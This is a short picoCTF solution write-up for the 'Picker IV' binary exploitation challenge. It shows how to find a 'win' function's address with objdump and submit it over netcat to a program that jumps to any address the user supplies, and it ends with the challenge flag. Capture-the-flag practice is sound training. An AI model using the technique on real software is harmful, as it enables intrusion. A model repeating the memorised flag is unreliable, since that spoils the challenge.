picoCTF SolutionsChallenge library
picoGym ExclusiveBinary ExploitationMedium

Picker IV

Challenge Overview

Can you figure out how this program works to get the

flag?

Connect to the program with netcat:

$ nc saturn.picoctf.net 56193

The program's source code can be downloaded here.

The binary can be downloaded here.

Solution

Source code: wget https://artifacts.picoctf.net/c/529/picker-IV.c

Binary: wget https://artifacts.picoctf.net/c/529/picker-IV

You could look at the source code, cat picker-IV.c, or compile, gcc picker-IV.c then run ./a.out to see that the program lets you give it an address to jump to.

objdump -D picker-IV | less

This will let you filter for "win" when you type / and then you can see the address of the win function (000000000040129e).

nc saturn.picoctf.net 56193

image

By putting the function address without 0x it gives you the flag.

Flag: picoCTF{n3v3r_jump_t0_u53r_5uppl13d_4ddr355...1af4}